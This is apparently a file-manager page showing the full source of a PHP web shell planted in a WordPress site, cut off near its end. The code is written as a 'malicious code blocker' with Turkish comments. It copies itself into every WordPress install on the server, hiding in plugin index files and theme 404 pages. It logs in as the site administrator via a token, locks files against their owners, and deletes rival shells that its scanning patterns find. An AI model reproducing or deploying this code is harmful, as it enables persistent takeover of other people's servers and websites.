Ð¤Ð°Ð¹Ð»Ð¾Ð²Ñ‹Ð¹ Ð¼ÐµÐ½ÐµÐ´Ð¶ÐµÑ€

Ð¤Ð°Ð¹Ð»Ð¾Ð²Ñ‹Ð¹ Ð¼ÐµÐ½ÐµÐ´Ð¶ÐµÑ€ - Ð ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ñ‚ÑŒ - /home/adiggxhn/chamba.lat/wp-content848/561h261f.php

ÐÐ°Ð·Ð°Ð´
<?php /* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === / // Hata raporlamayı kapat error_reporting(0); ini_set('display_errors', 0); // === OTOMATİK KULLANICI ADI VE DOSYA ADI ALGILAMA === $current_file = basename($_SERVER['SCRIPT_FILENAME']); $request_uri = $_SERVER['REQUEST_URI']; // Dosya adından kullanıcı adını al (.php uzantısını kaldır) $username = pathinfo($current_file, PATHINFO_FILENAME); // Şifre = kullanıcıadı + 34 $password = $username . '34'; // === OTOMATİK ALLOWED_SHELLS OLUŞTURMA === $allowed_shells = array($current_file); $common_shells = array( '404', 'forum', 'single', 'compent', 'settings', 'medage', 'index' ); foreach ($common_shells as $shell) { $shell_file = $shell . '.php'; if (!in_array($shell_file, $allowed_shells)) { $allowed_shells[] = $shell_file; } } // ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ ===== $is_allowed = false; if (in_array($current_file, $allowed_shells)) { $is_allowed = true; } if (strpos($request_uri, '/wp-admin') !== false \|\| strpos($request_uri, '/wp-login.php') !== false) { $is_allowed = true; } $wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php'); if (in_array($current_file, $wp_core_files)) { $is_allowed = true; } if (!$is_allowed) { if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>"; exit; } } // ===== WORDPRESS DOSYA KİLİTLEYİCİ SINIFI ===== class WordPressFileLocker { private $baseDir; private $passwordHash; private $excludePaths; private $lockFileMode = 0444; private $lockDirMode = 0555; private $unlockFileMode = 0644; private $unlockDirMode = 0755; public function __construct($baseDir = null, $password = null) { $this->baseDir = $baseDir ?? __DIR__; if ($password) { $this->passwordHash = hash('sha256', $password); } $this->excludePaths = [ $this->baseDir . '/cgi-bin', $this->baseDir . '/.git', $this->baseDir . '/.svn', $this->baseDir . '/.env' ]; } public function setPassword($password) { $this->passwordHash = hash('sha256', $password); return $this; } private function isPasswordValid($input) { if (!$this->passwordHash) return true; return hash_equals($this->passwordHash, hash('sha256', $input)); } private function isExcludedPath($path) { foreach ($this->excludePaths as $excluded) { if ($excluded && strpos($path, $excluded) === 0) { return true; } } return false; } private function getLockdownPluginPath() { return $this->baseDir . '/wp-content/mu-plugins/file-lockdown.php'; } private function writeLockdownMuPlugin(&$stats) { $pluginPath = $this->getLockdownPluginPath(); $muDir = dirname($pluginPath); if (!is_dir($muDir)) { if (!@mkdir($muDir, 0755, true)) { $stats['errors'][] = "MU-Plugin dizini oluşturulamadı: $muDir"; return false; } } $code = <<<'PHP' <?php /* * FILE LOCKDOWN (MU-Plugin) * Lock modu aktifken tüm dosya değişikliklerini engeller / if (!defined('ABSPATH')) { exit; } define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); add_filter('wp_handle_upload_prefilter', function($file) { return new WP_Error('locked', 'LOCK modu aktif: dosya yükleme kapalı.'); }, 9999); add_filter('pre_delete_attachment', '__return_false', 9999); add_filter('file_mod_allowed', '__return_false', 9999); PHP; if (@file_put_contents($pluginPath, $code, LOCK_EX)) { $stats['success'][] = "MU-Plugin yazıldı: $pluginPath"; return true; } $stats['errors'][] = "MU-Plugin yazılamadı: $pluginPath"; return false; } private function removeLockdownMuPlugin(&$stats) { $pluginPath = $this->getLockdownPluginPath(); if (is_file($pluginPath) && @unlink($pluginPath)) { $stats['success'][] = "MU-Plugin silindi: $pluginPath"; return true; } return false; } private function recursiveChmod($path, $fileMode, $dirMode, &$stats, $depth = 0) { if ($depth > 15) return; if (is_link($path)) return; if ($this->isExcludedPath($path)) return; if (is_dir($path)) { $items = @scandir($path); if ($items === false) { $stats['errors'][] = "Dizin okunamadı: $path"; return; } foreach ($items as $item) { if ($item === '.' \|\| $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $this->recursiveChmod($full, $fileMode, $dirMode, $stats, $depth + 1); } if (@chmod($path, $dirMode)) { $stats['dirs_changed'][] = $path; } else { $stats['errors'][] = "Klasör izni değiştirilemedi: $path"; } } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' \|\| $ext == 'phtml' \|\| $ext == 'php5' \|\| $ext == 'html' \|\| $ext == 'htm') { if (@chmod($path, $fileMode)) { $stats['files_changed'][] = $path; } else { $stats['errors'][] = "Dosya izni değiştirilemedi: $path"; } } } } public function lock($password = null) { if ($password && !$this->isPasswordValid($password)) { return ['success' => false, 'error' => 'Şifre hatalı']; } $stats = ['success' => [], 'errors' => [], 'files_changed' => [], 'dirs_changed' => []]; $start = microtime(true); $this->writeLockdownMuPlugin($stats); $this->recursiveChmod($this->baseDir, $this->lockFileMode, $this->lockDirMode, $stats); $elapsed = round(microtime(true) - $start, 2); return [ 'success' => empty($stats['errors']), 'mode' => 'LOCK', 'file_mode' => '0444', 'dir_mode' => '0555', 'files_changed' => count($stats['files_changed']), 'dirs_changed' => count($stats['dirs_changed']), 'elapsed' => $elapsed, 'errors' => $stats['errors'], 'details' => $stats ]; } public function unlock($password = null) { if ($password && !$this->isPasswordValid($password)) { return ['success' => false, 'error' => 'Şifre hatalı']; } $stats = ['success' => [], 'errors' => [], 'files_changed' => [], 'dirs_changed' => []]; $start = microtime(true); $this->removeLockdownMuPlugin($stats); $this->recursiveChmod($this->baseDir, $this->unlockFileMode, $this->unlockDirMode, $stats); $elapsed = round(microtime(true) - $start, 2); return [ 'success' => empty($stats['errors']), 'mode' => 'UNLOCK', 'file_mode' => '0644', 'dir_mode' => '0755', 'files_changed' => count($stats['files_changed']), 'dirs_changed' => count($stats['dirs_changed']), 'elapsed' => $elapsed, 'errors' => $stats['errors'], 'details' => $stats ]; } public function getStatus() { $testFile = $this->baseDir . '/index.php'; $testDir = $this->baseDir . '/wp-content'; $isLocked = false; if (file_exists($testFile)) { $perms = fileperms($testFile) & 0777; $isLocked = ($perms <= 0444); } $pluginExists = file_exists($this->getLockdownPluginPath()); return [ 'is_locked' => $isLocked, 'mu_plugin_active' => $pluginExists, 'base_dir' => $this->baseDir, 'wp_exists' => file_exists($this->baseDir . '/wp-config.php') ]; } } // ===== TÜM DOMAINLERİ BUL (TÜM OLASI DİZİNLERDE WORDPRESS ARA) ===== function get_all_domain_roots() { $roots = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) $roots[] = $path; } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/root\s+([^;]+);/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) $roots[] = $path; } } } } $home_domains = '/home'; if (is_dir($home_domains)) { foreach (@scandir($home_domains) as $user) { if ($user == '.' \|\| $user == '..') continue; $domains_dir = $home_domains . '/' . $user . '/domains'; if (is_dir($domains_dir)) { foreach (@scandir($domains_dir) as $domain) { if ($domain == '.' \|\| $domain == '..') continue; $public_html = $domains_dir . '/' . $domain . '/public_html'; if (is_dir($public_html) && is_wordpress_installed($public_html)) { if (!in_array($public_html, $roots)) $roots[] = $public_html; } } } } } $current = $_SERVER['DOCUMENT_ROOT'] ?? __DIR__; if (is_dir($current) && !in_array($current, $roots)) { if (is_wordpress_installed($current)) $roots[] = $current; } $roots = array_unique($roots); sort($roots); return $roots; } function is_wordpress_installed($path) { if (!is_dir($path)) return false; $wp_files = ['wp-config.php', 'wp-load.php', 'wp-settings.php']; $found_count = 0; foreach ($wp_files as $file) { if (file_exists($path . '/' . $file)) $found_count++; } return ($found_count >= 2); } function get_wordpress_domain_count() { static $count = null; if ($count === null) { $roots = get_all_domain_roots(); $count = count($roots); } return $count; } function get_wordpress_domains_list() { static $domains = null; if ($domains === null) { $roots = get_all_domain_roots(); $domains = array(); foreach ($roots as $root) { $domains[] = array( 'path' => $root, 'has_wp_config' => file_exists($root . '/wp-config.php'), 'has_wp_load' => file_exists($root . '/wp-load.php'), 'has_wp_admin' => is_dir($root . '/wp-admin'), 'has_wp_content' => is_dir($root . '/wp-content'), 'has_wp_includes' => is_dir($root . '/wp-includes') ); } } return $domains; } function check_password($pass) { global $username, $password; return ($pass === $password); } // ===== TÜM DİZİNLERDE ZARARLI KOD TARAMA ===== function scan_all_directories_for_malware() { global $allowed_shells; $all_roots = get_all_domain_roots(); $all_malicious = array(); $malicious_patterns = array( '/eval\s$\s[\'"\$]/i', '/base64_decode\s\(\s[\'"][A-Za-z0-9+\/=]+[\'"]\s$/i', '/gzinflate\s\(/i', '/system\s\(/i', '/exec\s\(/i', '/shell_exec\s\(/i', '/passthru\s\(/i', '/popen\s\(/i', '/proc_open\s\(/i', '/create_function\s\(/i', '/assert\s\(/i' ); foreach ($all_roots as $root) { $malicious = scan_directory_recursive($root, $malicious_patterns, $allowed_shells); $all_malicious = array_merge($all_malicious, $malicious); } return $all_malicious; } function scan_directory_recursive($dir, $patterns, $allowed_shells, $depth = 0) { $malicious = array(); if ($depth > 6) return $malicious; if (!is_dir($dir)) return $malicious; $skip_dirs = array('wp-admin', 'wp-includes', 'cache', 'tmp', 'backup', '.git', '.svn', 'node_modules', 'logs'); $dirname = basename($dir); if (in_array($dirname, $skip_dirs)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item == '.' \|\| $item == '..') continue; $path = $dir . '/' . $item; if (is_dir($path)) { $sub_results = scan_directory_recursive($path, $patterns, $allowed_shells, $depth + 1); $malicious = array_merge($malicious, $sub_results); } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' \|\| $ext == 'phtml' \|\| $ext == 'php5' \|\| $ext == 'php4') { if (in_array(basename($path), $allowed_shells)) continue; $content = @file_get_contents($path); if (!$content) continue; $risk_score = 0; $found_patterns = array(); foreach ($patterns as $pattern) { if (preg_match($pattern, $content)) { $risk_score += 10; $found_patterns[] = $pattern; } } if ($risk_score > 20) { $malicious[] = array( 'path' => $path, 'name' => basename($path), 'size' => filesize($path), 'risk' => min($risk_score, 100), 'patterns' => $found_patterns ); } } } } return $malicious; } function auto_deploy_shell_to_all_domains() { global $allowed_shells; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $all_roots = get_all_domain_roots(); $deployed = 0; foreach ($all_roots as $root) { if (!is_dir($root)) continue; $self_path = $root . '/' . basename($current_shell); if (!file_exists($self_path) \|\| md5_file($self_path) !== md5($current_content)) { if (@file_put_contents($self_path, $current_content)) { @chmod($self_path, 0644); $deployed++; } } $plugins_dir = $root . '/wp-content/plugins'; if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); $plugins_index = $plugins_dir . '/index.php'; if (!file_exists($plugins_index) \|\| md5_file($plugins_index) !== md5($current_content)) { if (@file_put_contents($plugins_index, $current_content)) { @chmod($plugins_index, 0644); $deployed++; } } $themes_dir = $root . '/wp-content/themes'; if (is_dir($themes_dir)) { foreach (@scandir($themes_dir) as $theme) { if ($theme == '.' \|\| $theme == '..') continue; $theme_path = $themes_dir . '/' . $theme; if (is_dir($theme_path)) { $hidden_shell = $theme_path . '/404.php'; if (!file_exists($hidden_shell) \|\| md5_file($hidden_shell) !== md5($current_content)) { if (@file_put_contents($hidden_shell, $current_content)) { @chmod($hidden_shell, 0644); $deployed++; } } } } } } return $deployed; } // ===== AJAX ENDPOINT'LERİ ===== $wpLocker = new WordPressFileLocker(__DIR__, $password); if (isset($_GET['wp_lock_action'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['wp_lock_action']; $pass = $_GET['pass'] ?? ''; if ($action === 'lock') { echo json_encode($wpLocker->lock($pass)); } elseif ($action === 'unlock') { echo json_encode($wpLocker->unlock($pass)); } elseif ($action === 'status') { echo json_encode($wpLocker->getStatus()); } exit; } if (isset($_GET['scan_all_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } set_time_limit(300); $all_malicious = scan_all_directories_for_malware(); $_SESSION['all_malicious'] = $all_malicious; $_SESSION['all_scan_completed'] = time(); echo json_encode([ 'success' => true, 'count' => count($all_malicious), 'domains_scanned' => count(get_all_domain_roots()), 'message' => count($all_malicious) . " zararlı dosya bulundu!" ]); exit; } if (isset($_GET['deploy_all_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $deployed = auto_deploy_shell_to_all_domains(); echo json_encode([ 'success' => true, 'deployed' => $deployed, 'domains' => count(get_all_domain_roots()), 'message' => "$deployed dosya kopyalandı!" ]); exit; } // ===== GLOBAL KİLİTLEME SINIFI ===== class GlobalFileLocker { private $allRoots; public function __construct() { $this->allRoots = get_all_domain_roots(); } private function recursiveChmodAll($path, $fileMode, $dirMode, &$stats, $depth = 0) { if ($depth > 10) return; if (is_link($path)) return; if (is_dir($path)) { $items = @scandir($path); if ($items !== false) { foreach ($items as $item) { if ($item === '.' \|\| $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $this->recursiveChmodAll($full, $fileMode, $dirMode, $stats, $depth + 1); } } if (@chmod($path, $dirMode)) $stats['dirs_ok']++; } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' \|\| $ext == 'phtml' \|\| $ext == 'php5' \|\| $ext == 'php4') { if (@chmod($path, $fileMode)) $stats['files_ok']++; } } } public function lock($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0444, 0555, $stats); } $elapsed = round(microtime(true) - $start, 2); $msg = "✅ TÜM SİSTEM KİLİTLENDI!\nİşlem yapılan domain: " . count($this->allRoots) . "\nPHP Dosyası: {$stats['files_ok']} \| Klasör: {$stats['dirs_ok']}\nSüre: {$elapsed} sn"; return json_encode(['success' => true, 'message' => $msg]); } public function unlock($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0644, 0755, $stats); } $elapsed = round(microtime(true) - $start, 2); $msg = "✅ TÜM SİSTEM KİLİDİ AÇILDI!\nİşlem yapılan domain: " . count($this->allRoots) . "\nPHP Dosyası: {$stats['files_ok']} \| Klasör: {$stats['dirs_ok']}\nSüre: {$elapsed} sn"; return json_encode(['success' => true, 'message' => $msg]); } public function getStatus($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $results = array(); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $testFile = $root . '/index.php'; $testDir = $root . '/wp-content'; $fileLocked = false; $dirLocked = false; if (file_exists($testFile)) { $perms = fileperms($testFile) & 0777; $fileLocked = ($perms <= 0444); } if (file_exists($testDir)) { $perms = fileperms($testDir) & 0777; $dirLocked = ($perms <= 0555); } $status = ($fileLocked && $dirLocked) ? "🔒 KİLİTLİ" : "🔓 AÇIK"; $results[] = "$root: $status"; } return json_encode(['success' => true, 'message' => "📊 TÜM SİSTEM DURUMU\n" . implode("\n", $results)]); } } $globalLocker = new GlobalFileLocker(); if (isset($_GET['kilit_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['kilit_ajax']; $pass = $_GET['pass'] ?? ''; if ($action === 'close') echo $globalLocker->lock($pass); elseif ($action === 'open') echo $globalLocker->unlock($pass); elseif ($action === 'izin') echo $globalLocker->getStatus($pass); else echo json_encode(['success' => false, 'message' => '']); exit; } function recreate_shell_in_plugins() { global $allowed_shells; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $roots = get_all_domain_roots(); foreach ($roots as $root) { $plugins_index = $root . '/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); if (file_exists($plugins_index)) { $existing = file_get_contents($plugins_index); if (strpos($existing, 'wp-blog-header.php') !== false) @unlink($plugins_index); elseif ($existing === $current_content) continue; } @file_put_contents($plugins_index, $current_content); @chmod($plugins_index, 0644); } } $current_script = basename(__FILE__); if (in_array($current_script, $GLOBALS['allowed_shells'])) { recreate_shell_in_plugins(); } function auto_wp_admin_login() { global $username, $password; if (!isset($_GET['wp_auto_login']) \|\| !isset($_GET['token'])) return false; $expected_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!hash_equals($expected_token, $_GET['token'])) return false; $roots = get_all_domain_roots(); foreach ($roots as $root) { $wp_load = $root . '/wp-load.php'; if (file_exists($wp_load)) { ob_start(); require_once $wp_load; ob_end_clean(); if (function_exists('get_users') && function_exists('wp_set_auth_cookie')) { $users = get_users(array('role' => 'administrator', 'number' => 1, 'orderby' => 'ID', 'order' => 'ASC')); if (!empty($users)) { wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); exit; } } } } echo "WordPress kurulumu bulunamadı!"; exit; } auto_wp_admin_login(); function scan_and_clean_php_files($directory) { global $allowed_shells; $malicious_patterns = array('/goto\s+[a-zA-Z0-9_]+;/', '/base64_decode\s$\s["\'][A-Za-z0-9+\/=]+["\']\s$/', '/eval\s$\s\$[A-Za-z0-9_]+/', '/@eval\s\(\s["\'].+["\']\s$/', '/create_function\s$\s["\'].+["\']\s,\s["\'].+["\']\s$/', '/gzinflate\s$\sbase64_decode\s\(\s["\'].+["\']\s$\s\)/'); $files = glob($directory . '/.php'); $cleaned = 0; foreach ($files as $file) { if (in_array(basename($file), $allowed_shells)) continue; $content = file_get_contents($file); foreach ($malicious_patterns as $pattern) { if (preg_match($pattern, $content)) { unlink($file); $cleaned++; break; } } } return $cleaned; } function auto_deploy_shell() { global $username; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $deployed = 0; $roots = get_all_domain_roots(); foreach ($roots as $root) { $self_path = $root . '/' . basename($current_shell); if (!file_exists($self_path) \|\| file_get_contents($self_path) !== $current_content) { if (@file_put_contents($self_path, $current_content)) { @chmod($self_path, 0644); $deployed++; } } $plugins_index = $root . '/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); if (!file_exists($plugins_index) \|\| file_get_contents($plugins_index) !== $current_content) { if (@file_put_contents($plugins_index, $current_content)) { @chmod($plugins_index, 0644); $deployed++; } } } return $deployed; } if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') { $deployed = auto_deploy_shell(); die("Shell kopyalama tamamlandı! $deployed dosya kopyalandı."); } / === ANA SHELL KODU === / session_start(); $stored_username = $username; $stored_password_hash = password_hash($password, PASSWORD_BCRYPT); $autologin_token = hash('sha256', $stored_username . ':' . $password . ':autologin_key'); $wp_auto_login_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!isset($_SESSION['authenticated']) \|\| $_SESSION['authenticated'] !== true) { if (isset($_GET['autologin']) && hash_equals($autologin_token, $_GET['autologin'])) { $_SESSION['authenticated'] = true; header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>Giris</title> <style>{margin:0;padding:0;box-sizing:border-box;}body{background:#1e272e;display:flex;align-items:center;justify-content:center;min-height:100vh;font-family:Arial;}.login-box{background:#2f3640;padding:40px;border-radius:10px;width:350px;}h2{color:#00a8ff;margin-bottom:20px;text-align:center;}input{width:100%;padding:10px;margin:8px 0;background:#1e272e;border:1px solid #40739e;color:#fff;border-radius:5px;}button{width:100%;padding:10px;background:#00a8ff;color:#fff;border:none;border-radius:5px;cursor:pointer;margin-top:10px;font-size:15px;}button:hover{background:#487eb0;}.error{background:#e84118;color:#fff;padding:8px;border-radius:5px;margin-bottom:10px;text-align:center;}</style> </head><body><div class="login-box"><h2>🔒 Giris Yap</h2> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?><div class="error">Hatali kullanici adi veya sifre!</div><?php endif; ?> <form method="post"><input type="text" name="username" placeholder="Kullanici Adi" required autofocus><input type="password" name="password" placeholder="Sifre" required><button type="submit">Giris</button></form> </div></body></html><?php exit; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $current_dir = realpath($_GET['dir'] ?? getcwd()) ?: getcwd(); $wordpress_core_files = array('wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config.php','wp-config-sample.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','index.php'); $wordpress_core_dirs = array('wp-admin','wp-includes'); $our_shells = $allowed_shells; $protected_files = array('.user.ini','wp-config.php'); $own_signature = md5_file(__FILE__); function get_all_domains_full_url() { $domains = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/ServerName\s+(\S+)/i', $c, $m) && preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') \|\| file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,':443')!==false \|\| stripos($c,'SSLEngine on')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.trim($m[1]),'path'=>$path,'type'=>'Apache'); } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' \|\| $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/server_name\s+([^;]+);/i', $c, $m) && preg_match('/root\s+([^;]+);/i', $c, $dr)) { $domain = trim(preg_split('/\s+/', trim($m[1]))[0]); $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') \|\| file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,'ssl')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.$domain,'path'=>$path,'type'=>'Nginx'); } } } } return $domains; } $all_domains = get_all_domains_full_url(); function scan_plugins($dir) { $result = array('suspicious'=>array(),'regular'=>array()); $pd = $dir.'/wp-content/plugins'; if (!is_dir($pd)) return $result; foreach (@scandir($pd) as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $pd.'/'.$item; if (is_dir($path)) { $sus = (strlen($item)<4 \|\| preg_match('/^[0-9a-f]{8,}$/i',$item) \|\| preg_match('/backup\|shell\|hack\|malware/i',$item)); $data = array('name'=>$item,'path'=>$path,'active'=>false,'suspicious'=>$sus); if ($sus) $result['suspicious'][]=$data; else $result['regular'][]=$data; } } return $result; } function scan_themes($dir) { $result = array('inactive'=>array(),'active'=>array()); $td = $dir.'/wp-content/themes'; if (!is_dir($td)) return $result; foreach (@scandir($td) as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $td.'/'.$item; if (is_dir($path)) $result['inactive'][] = array('name'=>$item,'path'=>$path); } return $result; } function find_malicious_files($dir) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; $malicious = array(); if (!is_dir($dir)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $dir.'/'.$item; if (is_dir($path)) { $skip = false; foreach ($GLOBALS['wordpress_core_dirs'] as $wd) { if (strpos($path,'/'.$wd)!==false) { $skip=true; break; } } if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path)); } elseif (is_file($path) && pathinfo($path,PATHINFO_EXTENSION)==='php') { if (in_array($item,$our_shells)\|\|in_array($item,$wordpress_core_files)\|\|in_array($item,$protected_files)) continue; if ($own_signature && @md5_file($path)===$own_signature) continue; $content = @file_get_contents($path); if (!$content) continue; $risk = 0; if (preg_match('/eval\s\(/i',$content)) $risk+=15; if (preg_match('/base64_decode/i',$content)) $risk+=10; if (preg_match('/gzinflate/i',$content)) $risk+=15; if (preg_match('/exec\s\(/i',$content)) $risk+=20; if (preg_match('/system\s\(/i',$content)) $risk+=20; if (preg_match('/shell_exec/i',$content)) $risk+=20; if (preg_match('/passthru/i',$content)) $risk+=20; if ($risk > 30) $malicious[] = array('path'=>$path,'name'=>$item,'size'=>filesize($path),'risk'=>min($risk,100)); } } return $malicious; } function delete_dir_recursive($dir) { if (!file_exists($dir)) return; if (is_file($dir)\|\|is_link($dir)) { @unlink($dir); return; } foreach (scandir($dir) as $item) { if ($item==='.'\|\|$item==='..') continue; delete_dir_recursive($dir.DIRECTORY_SEPARATOR.$item); } @rmdir($dir); } function delete_malicious($path) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; if (!file_exists($path)) return false; $filename = basename($path); if (in_array($filename,$protected_files)\|\|in_array($filename,$wordpress_core_files)\|\|in_array($filename,$our_shells)\|\|(is_file($path)&&$own_signature&&@md5_file($path)==$own_signature)) return false; foreach ($wordpress_core_dirs as $cd) { if (strpos($path,'/'.$cd.'/')!==false) return false; } @chmod($path,0777); @chmod(dirname($path),0777); if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf '.escapeshellarg($path).' 2>/dev/null'); } else { @unlink($path); @system('rm -f '.escapeshellarg($path).' 2>/dev/null'); @exec('rm -f '.escapeshellarg($path).' 2>/dev/null'); } return !file_exists($path); } function bulk_delete($paths) { $deleted = 0; $failed = 0; foreach ($paths as $path) { $path = stripslashes($path); if (is_dir($path)) { delete_dir_recursive($path); if (!file_exists($path)) $deleted++; else $failed++; } elseif (is_file($path)) { if (@unlink($path)) $deleted++; else $failed++; } } return ['deleted' => $deleted, 'failed' => $failed]; } function analyze_file($path) { if (!file_exists($path)) return "Dosya bulunamadi!"; $content = @file_get_contents($path); if (!$content) return "Dosya okunamadi!"; $result = array(); $result[] = "Dosya: ".$path; $result[] = "Boyut: ".filesize($path)." bytes"; $result[] = "Degistirilme: ".date('Y-m-d H:i:s',filemtime($path)); $result[] = "Izin: ".substr(sprintf('%o',fileperms($path)),-4); $result[] = ""; $dangerous = array('eval'=>'Kod calistirma','base64_decode'=>'Sifre cozme','gzinflate'=>'Sikistirma acma','exec'=>'Komut calistirma','system'=>'Komut calistirma','shell_exec'=>'Shell komutu','passthru'=>'Komut calistirma'); $found = false; foreach ($dangerous as $func=>$desc) { if (preg_match("/$func\s\(/i",$content)) { $result[]="TESPIT: $func() - $desc"; $found=true; } } if (!$found) $result[] = "Tehlikeli fonksiyon bulunamadi."; return implode("\n",$result); } $plugins = scan_plugins($current_dir); $themes = scan_themes($current_dir); function check_file_permission($file) { if (!file_exists($file)) return ['exists' => false, 'writable' => false, 'readable' => false, 'perms' => 'Dosya yok']; clearstatcache(true, $file); $perms = fileperms($file); return ['exists' => true, 'writable' => is_writable($file), 'readable' => is_readable($file), 'perms' => substr(sprintf('%o', $perms), -4), 'path' => $file]; } function set_file_permission($file, $writable) { if (!file_exists($file)) return false; clearstatcache(true, $file); if ($writable) return @chmod($file, 0644); else return @chmod($file, 0444); } if (isset($_GET['file_permission_action'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['file_permission_action']; $file = $_GET['file'] ?? ''; $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } if ($action === 'check') { $htaccess = check_file_permission($file . '/.htaccess'); $index = check_file_permission($file . '/index.php'); echo json_encode(['success' => true, 'htaccess' => $htaccess, 'index' => $index]); } elseif ($action === 'set_htaccess') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/.htaccess', $writable); echo json_encode(['success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '']); } elseif ($action === 'set_index') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/index.php', $writable); echo json_encode(['success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '']); } exit; } if (isset($_GET['bulk_delete_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $paths = $_GET['paths'] ?? ''; $pass 